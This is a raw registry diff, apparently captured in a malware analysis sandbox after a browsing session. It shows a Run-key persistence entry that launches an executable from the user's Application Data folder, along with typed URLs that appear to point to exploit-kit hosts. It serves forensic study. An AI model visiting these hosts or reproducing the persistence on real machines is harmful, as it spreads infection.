HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage ProgramsCache hex:09,00,00,00,0b,00,56,00,00,00,54,00,31,00,00,00,00,00,36,41,48,7e,11,00,50,72,6f,67,72,61,6d,73,00,00,3c,00,03,00,04,00,ef,be,36,41,40,7e,36,41,48,7e,14,00,26,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,73,00,00,00,40,73,68,65,6c,6c,33,32,2e,64,6c,6c,2c,2d,32,31,37,38,32,00,18,00,00,00,01,d4,00,00,00,d2,00,32,00,23,03,00,00,36,41,48,7e,20,00,49,4e,54,45,52,4e,7e,31,2e,4c,4e,4b,00,00,42,00,03,00,04,00,ef,be,36,41,48,7e,36,41,48,7e,14,00,00,00,49,00,6e,00,74,00,65,00,72,00,6e,00,65,00,74,00,20,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,00,72,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,74,00,00,00,0b,00,ef,be,00,00,00,00,00,00,00,00,43,00,3a,00,5c,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,20,00,46,00,69,00,6c,00,65,00,73,00,5c,00,49,00,6e,00,74,00,65,00,72,00,6e,00,65,00,74,00,20,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,00,72,00,5c,00,49,00,45,00,58,00,50,00,4c,00,4f,00,52,00,45,00,2e,00,45,00,58,00,45,00,00,00,00,00,1c,00,00,00,01,dc,00,00,00,da,00,32,00,e2,02,00,00,36,41,24,83,20,00,4f,55,54,4c,4f,4f, hex:09,00,00,00,0b,00,56,00,00,00,54,00,31,00,00,00,00,00,36,41,48,7e,11,00,50,72,6f,67,72,61,6d,73,00,00,3c,00,03,00,04,00,ef,be,36,41,40,7e,36,41,48,7e,14,00,26,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,73,00,00,00,40,73,68,65,6c,6c,33,32,2e,64,6c,6c,2c,2d,32,31,37,38,32,00,18,00,00,00,01,d4,00,00,00,d2,00,32,00,23,03,00,00,36,41,48,7e,20,00,49,4e,54,45,52,4e,7e,31,2e,4c,4e,4b,00,00,42,00,03,00,04,00,ef,be,36,41,48,7e,36,41,48,7e,14,00,00,00,49,00,6e,00,74,00,65,00,72,00,6e,00,65,00,74,00,20,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,00,72,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,74,00,00,00,0b,00,ef,be,00,00,00,00,00,00,00,00,43,00,3a,00,5c,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,20,00,46,00,69,00,6c,00,65,00,73,00,5c,00,49,00,6e,00,74,00,65,00,72,00,6e,00,65,00,74,00,20,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,00,72,00,5c,00,49,00,45,00,58,00,50,00,4c,00,4f,00,52,00,45,00,2e,00,45,00,58,00,45,00,00,00,00,00,1c,00,00,00,01,dc,00,00,00,da,00,32,00,e2,02,00,00,36,41,24,83,20,00,4f,55,54,4c,4f,4f,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage StartMenu_Balloon_Time hex:b0,27,b0,17,df,98,cd,01, hex:f0,f5,4b,1c,e0,98,cd,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACNGU hex:01,00,00,00,10,00,00,00,50,e8,07,19,df,98,cd,01, hex:01,00,00,00,14,00,00,00,90,71,d8,1e,e0,98,cd,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACNGU:P:\JVAQBJF\flfgrz32\pzq.rkr hex:01,00,00,00,08,00,00,00,d0,cf,da,d9,de,98,cd,01, hex:01,00,00,00,09,00,00,00,90,2d,68,fb,df,98,cd,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACNGU:P:\Cebtenz Svyrf\Vagrearg Rkcybere\VRKCYBER.RKR hex:01,00,00,00,08,00,00,00,b0,e4,6a,a6,dd,98,cd,01, hex:01,00,00,00,09,00,00,00,d0,f4,ef,4e,df,98,cd,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACVQY hex:01,00,00,00,0d,00,00,00,b0,f7,ed,18,df,98,cd,01, hex:01,00,00,00,11,00,00,00,00,91,ad,1e,e0,98,cd,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACVQY:%pfvqy2%\VafgnyyEvgr 2.5\VafgnyyEvgr.yax hex:01,00,00,00,08,00,00,00,b0,f7,ed,18,df,98,cd,01, hex:01,00,00,00,09,00,00,00,60,0a,ac,1e,e0,98,cd,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACVQY:%pfvqy2%\VafgnyyEvgr 2.5 hex:01,00,00,00,08,00,00,00,b0,f7,ed,18,df,98,cd,01, hex:01,00,00,00,09,00,00,00,00,91,ad,1e,e0,98,cd,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACNGU:P:\Cebtenz Svyrf\Rcfvyba Fdhnerq\VafgnyyEvgr\VafgnyyEvgr.rkr hex:01,00,00,00,08,00,00,00,50,e8,07,19,df,98,cd,01, hex:01,00,00,00,09,00,00,00,90,71,d8,1e,e0,98,cd,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACVQY:::{2559N1S4-21Q7-11Q4-OQNS-00P04S60O9S0} hex:01,00,00,00,07,00,00,00,b0,e4,6a,a6,dd,98,cd,01, hex:01,00,00,00,08,00,00,00,70,7b,f1,4e,df,98,cd,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACVQY:%pfvqy2%\Jverfunex.yax hex:01,00,00,00,02,00,00,00,00,00,00,00,00,00,00,00, hex:01,00,00,00,06,00,00,00,a0,58,5d,5d,df,98,cd,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACNGU:P:\Cebtenz Svyrf\Jverfunex\jverfunex.rkr hex:01,00,00,00,06,00,00,00,00,71,80,5d,df,98,cd,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore Type dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore Flags dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore Count dword:00000003
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore Time hex:dc,07,09,00,06,00,16,00,10,00,21,00,3a,00,fb,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore Type dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore Flags dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore Count dword:00000003
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore Time hex:dc,07,09,00,06,00,16,00,10,00,22,00,00,00,94,02,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore Time hex:dc,07,09,00,06,00,16,00,10,00,10,00,2a,00,c6,03, hex:dc,07,09,00,06,00,16,00,10,00,1c,00,22,00,04,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}\iexplore Count dword:00000002 dword:00000007
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}\iexplore Time hex:dc,07,09,00,06,00,16,00,10,00,10,00,2b,00,ab,01, hex:dc,07,09,00,06,00,16,00,10,00,1f,00,0f,00,50,02,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}\iexplore LoadTime dword:0000000c dword:00000009
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections SavedLegacySettings hex:46,00,00,00,10,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,04,00,00,00,00,00,00,00,30,28,aa,1f,da,98,cd,01,00,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,02,00,00,00,0a,00,00,42,00,00,00,00,00,00,00,00,01,00,00,00,05,00,00,00,c0,78,18,00,d0,72,18,00,00,00,00,00,10,01,00,00,ff,ff,ff,ff,00,00,00,00,0c,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,03,a8,02,00,00,00,00,00,c0,00,00,00,00,00,00,46,40,9d,05,22,9e,7e,cf,11,ae,5a,00,aa,00,a7,11,2b,73,00,61,00,6e,00,64,00,62,00,6f,00,78,00,00,00,00,00,00,00, hex:46,00,00,00,21,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,04,00,00,00,00,00,00,00,30,28,aa,1f,da,98,cd,01,00,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,02,00,00,00,0a,00,00,42,00,00,00,00,00,00,00,00,01,00,00,00,05,00,00,00,c0,78,18,00,d0,72,18,00,00,00,00,00,10,01,00,00,ff,ff,ff,ff,00,00,00,00,0c,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,03,a8,02,00,00,00,00,00,c0,00,00,00,00,00,00,46,40,9d,05,22,9e,7e,cf,11,ae,5a,00,aa,00,a7,11,2b,73,00,61,00,6e,00,64,00,62,00,6f,00,78,00,00,00,00,00,00,00,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Orimdie ""C:\Documents and Settings\bomber\Application Data\Feuw\myzyn.exe""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached {2559A1F4-21D7-11D4-BDAF-00C04F60B9F0} {000214E6-0000-0000-C000-000000000046} 0x401 hex:00,00,00,00,34,00,38,00,50,d3,6d,14,df,98,cd,01, hex:00,00,00,00,34,00,38,00,e0,c1,39,09,e0,98,cd,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached {2559A1F5-21D7-11D4-BDAF-00C04F60B9F0} {000214E6-0000-0000-C000-000000000046} 0x401 hex:00,00,00,00,34,00,38,00,20,bf,84,14,df,98,cd,01, hex:00,00,00,00,34,00,38,00,00,f8,1e,0a,e0,98,cd,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU NodeSlots hex:02, hex:02,02,
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU MRUListEx hex:00,00,00,00,ff,ff,ff,ff, hex:01,00,00,00,00,00,00,00,ff,ff,ff,ff,
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU 1 hex:14,00,1f,48,ba,8f,0d,45,25,ad,d0,11,98,a8,08,00,36,1b,11,03,00,00,
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\1 NodeSlot dword:00000002
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\1 MRUListEx hex:ff,ff,ff,ff,
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\Bags\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\Bags\2\Shell
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\Bags\2\Shell FolderType "MyDocuments"
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache @explorer.exe,-7004 "Opens your Internet browser."
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs url1 "http://www.google.com/" "http://46.249.59.116/main.php?page=5a56c997ffff2f79"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs url2 "http://google.com/" "http://www.google.com/"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs url3 "http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775" "http://ns8.ns360.info/main.php?page=f61d19dee2176c62"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs url4 "http://urlquery.net/" "http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs url5 "http://search.live.com/results.aspx?q=download+wireshark&src=IE-SearchBox&Form=IE8SRC" "http://urlquery.net/"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs url6 "http://www.oldversion.com/download.php?version=%2Fdownload-Java-Platform-Java-6-Update-29.html" "http://google.com/"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs url7 "http://oldversion.com/" "http://search.live.com/results.aspx?q=download+wireshark&src=IE-SearchBox&Form=IE8SRC"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs url8 "http://go.microsoft.com/fwlink/?LinkId=69157" "http://www.oldversion.com/download.php?version=%2Fdownload-Java-Platform-Java-6-Update-29.html"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs url9 "http://oldversion.com/"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs url10 "http://go.microsoft.com/fwlink/?LinkId=69157"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\DropDown
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Health
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{0890F930-4F80-4646-BAB1-4B6E5571FB89}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{1F32514F-1561-4922-A604-8A1F478B5A42}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{52903d79-f993-4de6-8317-20c9c176d823}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{59E7BF52-E5C9-4382-A39A-522DEE9AFDFD}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{5DF031B7-6A37-42D9-8802-E27F4F224332}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{5DF031B7-6A37-42D9-8802-E27F4F224332} AttemptedAutoRun dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{5F4BB5C9-4652-489B-8601-EEC0C3C32E2E}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{7F2B1D6B-1357-402C-A1C8-67E59583B41D}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{93075F62-16B3-43EC-A53B-FFAD0E01D5E7}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{9695AEF9-9D03-4671-8F2F-FF49D1BB01C4}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACVQY hex:01,00,00,00,0d,00,00,00,b0,f7,ed,18,df,98,cd,01, hex:01,00,00,00,11,00,00,00,00,91,ad,1e,e0,98,cd,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACVQY:%pfvqy2%\VafgnyyEvgr 2.5\VafgnyyEvgr.yax hex:01,00,00,00,08,00,00,00,b0,f7,ed,18,df,98,cd,01, hex:01,00,00,00,09,00,00,00,60,0a,ac,1e,e0,98,cd,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACVQY:%pfvqy2%\VafgnyyEvgr 2.5 hex:01,00,00,00,08,00,00,00,b0,f7,ed,18,df,98,cd,01, hex:01,00,00,00,09,00,00,00,00,91,ad,1e,e0,98,cd,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACNGU:P:\Cebtenz Svyrf\Rcfvyba Fdhnerq\VafgnyyEvgr\VafgnyyEvgr.rkr hex:01,00,00,00,08,00,00,00,50,e8,07,19,df,98,cd,01, hex:01,00,00,00,09,00,00,00,90,71,d8,1e,e0,98,cd,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACVQY:::{2559N1S4-21Q7-11Q4-OQNS-00P04S60O9S0} hex:01,00,00,00,07,00,00,00,b0,e4,6a,a6,dd,98,cd,01, hex:01,00,00,00,08,00,00,00,70,7b,f1,4e,df,98,cd,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACVQY:%pfvqy2%\Jverfunex.yax hex:01,00,00,00,02,00,00,00,00,00,00,00,00,00,00,00, hex:01,00,00,00,06,00,00,00,a0,58,5d,5d,df,98,cd,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACNGU:P:\Cebtenz Svyrf\Jverfunex\jverfunex.rkr hex:01,00,00,00,06,00,00,00,00,71,80,5d,df,98,cd,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore Type dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore Flags dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore Count dword:00000003
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore Time hex:dc,07,09,00,06,00,16,00,10,00,21,00,3a,00,fb,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore Type dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore Flags dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore Count dword:00000003
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore Time hex:dc,07,09,00,06,00,16,00,10,00,22,00,00,00,94,02,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore Type dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore Flags dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}\iexplore LoadTime dword:0000000c dword:00000009
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections SavedLegacySettings hex:46,00,00,00,10,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,04,00,00,00,00,00,00,00,30,28,aa,1f,da,98,cd,01,00,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,02,00,00,00,0a,00,00,42,00,00,00,00,00,00,00,00,01,00,00,00,05,00,00,00,c0,78,18,00,d0,72,18,00,00,00,00,00,10,01,00,00,ff,ff,ff,ff,00,00,00,00,0c,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,03,a8,02,00,00,00,00,00,c0,00,00,00,00,00,00,46,40,9d,05,22,9e,7e,cf,11,ae,5a,00,aa,00,a7,11,2b,73,00,61,00,6e,00,64,00,62,00,6f,00,78,00,00,00,00,00,00,00, hex:46,00,00,00,21,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,04,00,00,00,00,00,00,00,30,28,aa,1f,da,98,cd,01,00,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,02,00,00,00,0a,00,00,42,00,00,00,00,00,00,00,00,01,00,00,00,05,00,00,00,c0,78,18,00,d0,72,18,00,00,00,00,00,10,01,00,00,ff,ff,ff,ff,00,00,00,00,0c,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,03,a8,02,00,00,00,00,00,c0,00,00,00,00,00,00,46,40,9d,05,22,9e,7e,cf,11,ae,5a,00,aa,00,a7,11,2b,73,00,61,00,6e,00,64,00,62,00,6f,00,78,00,00,00,00,00,00,00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Run Orimdie ""C:\Documents and Settings\bomber\Application Data\Feuw\myzyn.exe""
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached {2559A1F4-21D7-11D4-BDAF-00C04F60B9F0} {000214E6-0000-0000-C000-000000000046} 0x401 hex:00,00,00,00,34,00,38,00,50,d3,6d,14,df,98,cd,01, hex:00,00,00,00,34,00,38,00,e0,c1,39,09,e0,98,cd,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached {2559A1F5-21D7-11D4-BDAF-00C04F60B9F0} {000214E6-0000-0000-C000-000000000046} 0x401 hex:00,00,00,00,34,00,38,00,20,bf,84,14,df,98,cd,01, hex:00,00,00,00,34,00,38,00,00,f8,1e,0a,e0,98,cd,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU NodeSlots hex:02, hex:02,02,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU MRUListEx hex:00,00,00,00,ff,ff,ff,ff, hex:01,00,00,00,00,00,00,00,ff,ff,ff,ff,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU 1 hex:14,00,1f,48,ba,8f,0d,45,25,ad,d0,11,98,a8,08,00,36,1b,11,03,00,00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\1
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\1 NodeSlot dword:00000002
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\1 MRUListEx hex:ff,ff,ff,ff,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\2
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\2\Shell
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\2\Shell FolderType "MyDocuments"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache @explorer.exe,-7004 "Opens your Internet browser."
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache @shell32.dll,-12704 "Internet P&roperties"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache @C:\WINDOWS\system32\ieframe.dll.mui,-39229 "Browse Without &Add-ons"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache @shell32.dll,-12705 "&Browse the Internet"
